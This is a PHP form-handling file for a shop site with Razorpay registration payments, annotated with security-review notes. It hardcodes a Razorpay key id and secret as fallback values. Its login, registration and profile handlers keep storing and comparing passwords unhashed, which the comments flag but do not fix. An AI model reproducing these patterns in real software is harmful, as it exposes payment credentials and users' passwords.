<?php
// Shared bootstrap: opens the database connection and derives per-request values
// (page name, active shop row, request origin) used further down in this file.
include 'db_connect.php';
$con->set_charset('utf8mb4');

// Capitalised name of the running script, without directory or extension.
$page = pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME);
$page = ucfirst($page);

// First row of `shop` with status=1.
$shop_q = $con->query('SELECT * FROM `shop` WHERE status=1');
$shop = $shop_q->fetch_assoc();

// Scheme + host of the current request.
// NOTE(review): HTTP_HOST comes from the request's Host header, so $domain1 is
// client-influenced. Confirm it is checked against the site's known hostnames
// before it is used in emailed links, redirects or any security decision.
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
	$domain1 = 'https';
} else {
	$domain1 = 'http';
}
$domain1 .= '://' . $_SERVER['HTTP_HOST'];
/**
 * Extract the trailing "label.suffix" portion of a URL's host.
 *
 * The match is purely pattern based (a label of at least two characters, a dot,
 * then 2-6 letters or dots anchored at the end of the host). It does not consult
 * a public-suffix list, so short hosts such as "shop.ab.com" are returned whole
 * and suffixes longer than six characters do not match.
 *
 * @param string $url URL to inspect.
 * @return string|false The matched domain, or FALSE when the URL has no host or
 *                      the host does not fit the pattern.
 */
function getDomain($url)
{
	$parts = parse_url($url);
	// A malformed URL (parse_url() === false) or a URL without a host both yield ''.
	$host = $parts['host'] ?? '';

	$found = preg_match('/(?P<domain>[a-z0-9][a-z0-9\-]{1,63}\.[a-z\.]{2,6})$/i', $host, $match);
	if (!$found) {
		return FALSE;
	}

	return $match['domain'];
}
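$domain = getDomain($domain1);  // Domain portion of the request host (no "www."), or FALSE
$path2 = './assets/img/';       // Image directory as seen from the admin side
$path = './admin/assets/img/';  // Image directory as seen from the user side

// Razorpay API credentials.
//
// The key id and secret can now be supplied through the RAZORPAY_KEY_ID and
// RAZORPAY_KEY_SECRET environment variables, so they do not have to live in a
// file under the web root. The literal test values are kept only as a
// backward-compatible fallback for deployments that have not set them yet.
//
// NOTE(review): any credential that has ever been written into this file,
// including live keys that were previously kept here in a comment, should be
// treated as exposed: rotate it in the Razorpay dashboard and provide the new
// value via the environment rather than editing this file.
$keyId = getenv('RAZORPAY_KEY_ID') ?: 'rzp_test_EFJDmyX326UjBl';
$keySecret = getenv('RAZORPAY_KEY_SECRET') ?: 'YwqX5hVFr5IttFGx0dy8ljkB';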

// Lookup of products that currently carry a deal price, keyed by product id.
// Each entry holds the regular offer price, the deal price and the per-order
// quantity cap.
$best_deal_products = [];
$deal_query = $con->query('SELECT id, offer_price, deal_price, max_purchase_qty FROM `product` WHERE deal_price>0');
while (true) {
	$row = $deal_query->fetch_assoc();
	if (!$row) {
		break; // no more rows
	}
	$best_deal_products[$row['id']] = array(
		'price' => $row['offer_price'],
		'deal_price' => $row['deal_price'],
		'max_purchase_qty' => $row['max_purchase_qty'],
	);
}

// Lookup of every product's `qty2` value, keyed by product id.
$product_details = [];
$product_query = $con->query('SELECT id, qty2 FROM `product`');
while (true) {
	$row = $product_query->fetch_assoc();
	if (!$row) {
		break; // result set exhausted
	}
	$product_details[$row['id']] = array('qty2' => $row['qty2']);
}

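//=============================== User login ==============================================
// Authenticates a user by email, phone or userid. On success the identity is
// stored in the session and the browser is redirected; on failure
// $error_message is set for the page to display.
//
// NOTE(review): the query compares the submitted password with the `password`
// column directly, i.e. passwords are stored unhashed. Moving to
// password_hash()/password_verify() needs a coordinated change in the
// registration and profile-update handlers of this file plus a migration of
// existing rows, so it is flagged here rather than changed.
// NOTE(review): nothing visible here limits repeated failed attempts; confirm
// throttling exists elsewhere.
if ($_SERVER["REQUEST_METHOD"] == "POST"  && isset($_POST['user_login'])) {
	// Missing or non-string fields are treated as empty instead of raising errors.
	$username = isset($_POST['username']) && is_string($_POST['username']) ? trim($_POST['username']) : '';
	$password = isset($_POST['password']) && is_string($_POST['password']) ? trim($_POST['password']) : '';

	$user = null;
	// Blank credentials are rejected up front so they can never match a row
	// whose email/phone/password column happens to be empty.
	if ($username !== '' && $password !== '') {
		// Bound parameters instead of escaping + string concatenation.
		$stmt = $con->prepare("SELECT userid, name FROM users WHERE (email = ? OR phone = ? OR userid = ?) AND password = ? AND status = 1");
		$stmt->bind_param("ssss", $username, $username, $username, $password);
		$stmt->execute();
		$stmt->store_result();
		if ($stmt->num_rows == 1) {
			$stmt->bind_result($login_userid, $login_name);
			$stmt->fetch();
			$user = ['userid' => $login_userid, 'name' => $login_name];
		}
		$stmt->close();
	}

	if ($user !== null) {
		// Issue a fresh session id on login so a pre-login id cannot be reused.
		if (session_status() === PHP_SESSION_ACTIVE && !headers_sent()) {
			session_regenerate_id(true);
		}
		$_SESSION['userid'] = $user['userid'];
		$_SESSION['name'] = $user['name'];

		// Only same-site relative targets are honoured: the allow-list has no
		// ':' (no scheme), no backslash and no quotes, and a leading '//'
		// (protocol-relative URL) is refused. Anything else falls back to the
		// account page.
		$redirect_to = 'my-account';
		if (isset($_GET['returnpath']) && is_string($_GET['returnpath'])) {
			$candidate = $_GET['returnpath'];
			if (preg_match('~^[A-Za-z0-9_./?&=%\-]+$~', $candidate) && strncmp($candidate, '//', 2) !== 0) {
				$redirect_to = $candidate;
			}
		}

		// json_encode() with the HEX flags yields a JS string literal that
		// cannot terminate the surrounding <script> element.
		echo '<script>window.location.href=' . json_encode($redirect_to, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . '; </script>';
		exit;
	} else {
		$error_message = "Invalid username or password.";
	}
}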

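//========================= User Register ===============================================
// Inserts the new user row and then renders the Razorpay checkout for the
// registration fee. Every server-side value placed into the inline script is
// emitted through json_encode() with the HEX flags, so request data (name,
// email, phone, order id) and the shop name cannot break out of the JavaScript
// string or the <script> element.
//
// NOTE(review): the password is inserted as submitted (unhashed). Hashing it
// here needs a matching change in the login and profile-update handlers and a
// migration of existing rows, so it is flagged rather than changed.
// NOTE(review): $userid comes from rand(), which is not a CSPRNG, and the value
// is not checked for collisions before the INSERT.
// NOTE(review): order_id is taken from the request and the payment result is
// handed to register-success through the browser. Presumably that page verifies
// the Razorpay signature server-side and does not trust the `userid` query
// parameter on its own; confirm.
// NOTE(review): jQuery is loaded from a CDN without an integrity attribute;
// consider pinning it with Subresource Integrity or serving it locally.
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['user_register'])) {
	// Missing or non-string fields become '' instead of raising errors.
	$sponsorid = isset($_POST['sponsorid']) && is_string($_POST['sponsorid']) ? trim($_POST['sponsorid']) : '';
	$name = isset($_POST['name']) && is_string($_POST['name']) ? trim($_POST['name']) : '';
	$phone = isset($_POST['phone']) && is_string($_POST['phone']) ? trim($_POST['phone']) : '';
	$email = isset($_POST['email']) && is_string($_POST['email']) ? trim($_POST['email']) : '';
	$password = isset($_POST['password']) && is_string($_POST['password']) ? trim($_POST['password']) : '';
	$date = date('d-m-Y H:i:s');
	$userid = 'JD' . rand(100000, 999999);
	$orderId = isset($_POST['order_id']) && is_string($_POST['order_id']) ? $_POST['order_id'] : '';
	$amount = 1100;

	// Flags that keep json_encode() output safe inside an inline <script>.
	$js_json_flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

	// Insert the new user into the database
	$query = "INSERT INTO users (userid, sponcerid, name, phone, email, password, join_date) VALUES (?, ?, ?, ?, ?, ?, ?)";
	$stmt = $con->prepare($query);
	$stmt->bind_param("sssssss", $userid, $sponsorid, $name, $phone, $email, $password, $date);

	if ($stmt->execute()) { ?>
		<style>
			.warning-message {
				position: fixed;
				top: 10px;
				/* Adjust this value to control the vertical position */
				left: 50%;
				transform: translateX(-50%);
				background-color: yellow;
				/* Background color for visibility */
				color: red;
				/* Text color */
				padding: 10px 20px;
				border: 2px solid red;
				border-radius: 5px;
				font-size: 16px;
				font-weight: bold;
				z-index: 1000;
				/* Ensure it is on top of other elements */
			}

			.warning-message a {
				color: blue;
				/* Color for the link */
				text-decoration: underline;
				/* Underline the link */
				margin-left: 10px;
				/* Space between the message and the link */
			}
		</style>
		<div class="warning-message">
			Please do not press the back or refresh button.
			If the page is not working, <a href="./">GO TO HOME</a>
		</div>


		<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
		<script src="https://checkout.razorpay.com/v1/checkout.js"></script>
		<script>
			$(document).ready(function() {
				var options = {
					"key": <?= json_encode($keyId, $js_json_flags) ?>, // Key ID generated from the Dashboard
					"amount": <?= json_encode((string) ($amount * 100), $js_json_flags) ?>, // Amount in paise
					"currency": "INR",
					"name": <?= json_encode(isset($shop['name']) ? (string) $shop['name'] : '', $js_json_flags) ?>,
					"description": "Registration Fee",
					"image": "https://jeevandayinijeevikagausewasadan.in/img/favicon.png",
					"order_id": <?= json_encode($orderId, $js_json_flags) ?>,
					"handler": function(response) {
						// Redirect to a thank you page with payment details
						window.location.href = 'register-success?payment_id=' + encodeURIComponent(response.razorpay_payment_id) + '&order_id=' + encodeURIComponent(response.razorpay_order_id) + '&signature=' + encodeURIComponent(response.razorpay_signature) + '&userid=' + encodeURIComponent(<?= json_encode($userid, $js_json_flags) ?>);
					},
					"prefill": {
						"name": <?= json_encode($name, $js_json_flags) ?>,
						"email": <?= json_encode($email, $js_json_flags) ?>,
						"contact": <?= json_encode($phone, $js_json_flags) ?>
					},
					"theme": {
						"color": "#a81c19"
					}
				};
				var rzp1 = new Razorpay(options);
				rzp1.open();
			});
		</script>
		<?php
	} else {
		$_SESSION['error'] = "Registration failed. Please try again.";
		header("Location: signup");
		exit;
	}
	$stmt->close();
}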

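//======================= Use Wallet Balance===============================
// Records how much wallet balance the shopper wants to apply to the order.
//
// The three amounts are now required to be finite, non-negative numbers and
// are compared numerically. Previously non-numeric strings were compared as
// text and a negative amount passed both limit checks.
//
// NOTE(review): total_wallet_bal and max_use_wallet_bal still arrive in the
// same POST as the amount being checked, so the limits are client-controlled.
// The authoritative balance and cap should be read server-side for
// $_SESSION['userid'] before the amount is accepted; the wallet storage is not
// visible in this file, so that lookup is not added here.
if (isset($_POST["use_wallet"])) {
	$total_wallet_bal = isset($_POST['total_wallet_bal']) ? $_POST['total_wallet_bal'] : null;
	$max_use_wallet_bal = isset($_POST['max_use_wallet_bal']) ? $_POST['max_use_wallet_bal'] : null;
	$wallet_bal1 = isset($_POST['use_bal']) ? $_POST['use_bal'] : null;
	$date = date('d-m-Y');

	// is_numeric() is false for arrays, null and non-numeric strings.
	$wallet_input_ok = is_numeric($total_wallet_bal)
		&& is_numeric($max_use_wallet_bal)
		&& is_numeric($wallet_bal1)
		&& is_finite((float) $wallet_bal1)
		&& (float) $wallet_bal1 >= 0;

	if (!$wallet_input_ok || (float) $wallet_bal1 > (float) $total_wallet_bal || (float) $wallet_bal1 > (float) $max_use_wallet_bal) {
		echo '<script>alert("Invalid Amount"); </script> ';
		return false;
	} else {
		// Store the normalised number rather than the raw request string.
		$_SESSION['wallet_bal'] = (float) $wallet_bal1;
		echo '<script>alert("Wallet Balance Applied Successfully."); window.location.href=""; </script>';
	}
}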

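//=========================== Email Subscription ==============================
// Adds an address to the newsletter list unless it is already present.
//
// The address is validated and passed to the database as a bound parameter;
// it was previously concatenated into both SQL statements unescaped.
if (isset($_POST["email_subscribe"])) {
	$email = isset($_POST['email']) && is_string($_POST['email']) ? trim($_POST['email']) : '';
	$date = date('Y-m-d');

	if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
		echo ' <script>alert("Please enter a valid email address");</script> ';
	} else {
		// Existence check.
		$stmt = $con->prepare("SELECT 1 FROM `subscription` WHERE email = ? LIMIT 1");
		$stmt->bind_param("s", $email);
		$stmt->execute();
		$stmt->store_result();
		$already_subscribed = $stmt->num_rows > 0;
		$stmt->close();

		if ($already_subscribed) {
			echo ' <script>alert("Thanks To Resubscribe Our Newsletter");</script> ';
		} else {
			$stmt = $con->prepare("INSERT INTO `subscription`(`email`, `date`) VALUES (?, ?)");
			$stmt->bind_param("ss", $email, $date);
			$stmt->execute();
			$stmt->close();
			echo ' <script>alert("Thanks to subscribe our newsletter");</script> ';
		}
	}
}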

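//========================Add New Address==========================================
// Stores a new delivery address for the logged-in user.
//
// All values, including the session user id, are bound as parameters, and the
// insert is skipped when no user is logged in (previously a row with an empty
// userid was written).
if (isset($_POST['add_new_address'])) {
	// Returns the named POST field as a string, or '' when missing/non-string.
	$post_text = function ($key) {
		return isset($_POST[$key]) && is_string($_POST[$key]) ? $_POST[$key] : '';
	};

	$address_userid = isset($_SESSION['userid']) ? (string) $_SESSION['userid'] : '';

	if ($address_userid === '') {
		echo ' <script>alert("Please login to add an address."); window.location.href="";</script> ';
	} else {
		$name = $post_text('name');
		$address = $post_text('address');
		$landmark = $post_text('landmark');
		$city = $post_text('city');
		$state = $post_text('state');
		$pin = $post_text('pin');
		$phone = $post_text('phone');

		$stmt = $con->prepare("INSERT INTO `user_address`(`userid`, `name`, `phone`, `address`, `landmark`, `city`, `state`, `pin`) VALUES (?, ?, ?, ?, ?, ?, ?, ?)");
		$stmt->bind_param("ssssssss", $address_userid, $name, $phone, $address, $landmark, $city, $state, $pin);
		$stmt->execute();
		$stmt->close();

		echo ' <script>alert("New Address Addedd Successfully !"); window.location.href="";</script> ';
	}
}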

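//=========================Update Address======================================
// Updates one of the logged-in user's saved addresses.
//
// Two changes from the earlier version: the address id is bound as a parameter
// (it was concatenated into the statement unescaped), and the UPDATE is scoped
// to the session user's own rows through the `userid` column, so an id
// belonging to another account is left untouched.
if (isset($_POST['update_address'])) {
	// Returns the named POST field as a string, or '' when missing/non-string.
	$post_text = function ($key) {
		return isset($_POST[$key]) && is_string($_POST[$key]) ? $_POST[$key] : '';
	};

	$name = $post_text('name');
	$address = $post_text('address');
	$landmark = $post_text('landmark');
	$city = $post_text('city');
	$state = $post_text('state');
	$pin = $post_text('pin');
	$phone = $post_text('phone');
	$id = $post_text('id');
	$address_userid = isset($_SESSION['userid']) ? (string) $_SESSION['userid'] : '';

	// Without a logged-in user there is no row this request may change.
	if ($address_userid !== '') {
		$stmt = $con->prepare("UPDATE `user_address` SET `name` = ?, `phone` = ?, `address` = ?, `landmark` = ?, `city` = ?, `state` = ?, `pin` = ? WHERE id = ? AND userid = ?");
		$stmt->bind_param("sssssssss", $name, $phone, $address, $landmark, $city, $state, $pin, $id, $address_userid);
		$stmt->execute();
		$stmt->close();
	}

	echo ' <script>window.location.href="my-account";</script> ';
}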


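//=========================Update Profile======================================
// Updates the logged-in user's name and email and, when all three password
// fields are filled in, changes the password.
//
// Changes from the earlier version:
//  - every statement uses bound parameters;
//  - the old password is verified against the database. Before, it was compared
//    with an `old_password` value sent in the same request, and "Password
//    Changed !" was shown even when the UPDATE matched no row;
//  - password fields are trimmed, matching the login and registration handlers
//    (an untrimmed new password could not be used to log in again);
//  - nothing is written when no user is logged in.
//
// NOTE(review): passwords are stored and compared unhashed; switching to
// password_hash()/password_verify() needs a coordinated change with the login
// and registration handlers plus a migration of existing rows.
// NOTE(review): the form presumably carried the current password in an
// `old_password` field; that field is no longer read and should be removed
// from the page markup. Confirm against the template.
// NOTE(review): no anti-CSRF token is checked by this handler.
if (isset($_POST['profile_update'])) {
	// Returns the named POST field as a string, or '' when missing/non-string.
	$post_text = function ($key) {
		return isset($_POST[$key]) && is_string($_POST[$key]) ? $_POST[$key] : '';
	};

	$name = $post_text('name');
	$email = $post_text('email');
	$old_pass = trim($post_text('old_pass'));
	$new_pass = trim($post_text('new_pass'));
	$cnew_pass = trim($post_text('cnew_pass'));
	$userid = isset($_SESSION['userid']) ? (string) $_SESSION['userid'] : '';

	if ($userid === '') {
		echo ' <script>alert("Please login to update your profile."); window.location.href="";</script> ';
	} else {
		$stmt = $con->prepare("UPDATE `users` SET `name` = ?, `email` = ? WHERE userid = ?");
		$stmt->bind_param("sss", $name, $email, $userid);
		$stmt->execute();
		$stmt->close();

		if ($old_pass !== '' && $new_pass !== '' && $cnew_pass !== '') {
			// Server-side check that the supplied old password is the stored one.
			$stmt = $con->prepare("SELECT 1 FROM `users` WHERE userid = ? AND password = ? LIMIT 1");
			$stmt->bind_param("ss", $userid, $old_pass);
			$stmt->execute();
			$stmt->store_result();
			$old_pass_ok = $stmt->num_rows > 0;
			$stmt->close();

			if (!$old_pass_ok) {
				echo '<script>alert("Old Password is wrong !"); window.location.href="";</script> ';
			} elseif ($new_pass !== $cnew_pass) {
				echo ' <script>alert("Password does not matched !"); window.location.href="";</script> ';
			} else {
				$stmt = $con->prepare("UPDATE `users` SET `password` = ? WHERE userid = ? AND password = ?");
				$stmt->bind_param("sss", $new_pass, $userid, $old_pass);
				$stmt->execute();
				$stmt->close();
				echo ' <script>alert("Password Changed !"); window.location.href="";</script> ';
			}
		}
	}
}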

//========================Contact page msg==========================================
// Saves a contact-form submission to the `feedback` table and reloads the page.
// Each field is escaped for the SQL string context before it is placed in the
// statement.
// NOTE(review): the stored values are escaped for SQL only; whatever page later
// displays feedback rows must HTML-escape them on output. Confirm.
if (isset($_POST['send_msg'])) {
	$date = date('d-m-Y');
	$phone = $con->real_escape_string($_POST['phone']);
	$message = $con->real_escape_string($_POST['message']);
	$subject = $con->real_escape_string($_POST['subject']);
	$email = $con->real_escape_string($_POST['email']);
	$name = $con->real_escape_string($_POST['name']);

	$con->query(sprintf(
		"INSERT INTO `feedback`(`name`, `email`, `phone`, `subject`, `mes`, `date`) VALUES ('%s', '%s', '%s', '%s', '%s', '%s')",
		$name,
		$email,
		$phone,
		$subject,
		$message,
		$date
	));

	echo ' <script>alert("Message Sent Successfully !"); window.location.href="";</script> ';
}

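//=====================Product Search Bar ======================================
// Redirects a search-bar submission to the shop listing with the term in the
// query string.
//
// The term is now URL-encoded and the whole URL is emitted as a JSON string
// literal with the HEX flags. Before, the term was only SQL-escaped, which does
// not neutralise '<' or '>' and so let the value close the <script> element.
//
// NOTE(review): the shop page now receives the raw term rather than an
// SQL-escaped copy. It must bind or escape the value itself, which it needed
// to do anyway because the URL can be requested directly. Confirm.
if (isset($_GET['search_p'])) {
	$search_raw = isset($_GET['search']) && is_string($_GET['search']) ? $_GET['search'] : '';
	// Kept for any later code that still reads $search as an SQL-escaped value.
	$search = mysqli_real_escape_string($con, $search_raw);

	$search_url = 'shop?p=1&search=' . rawurlencode($search_raw);
	echo ' <script>window.location.href=' . json_encode($search_url, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . ';</script> ';
}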

?>
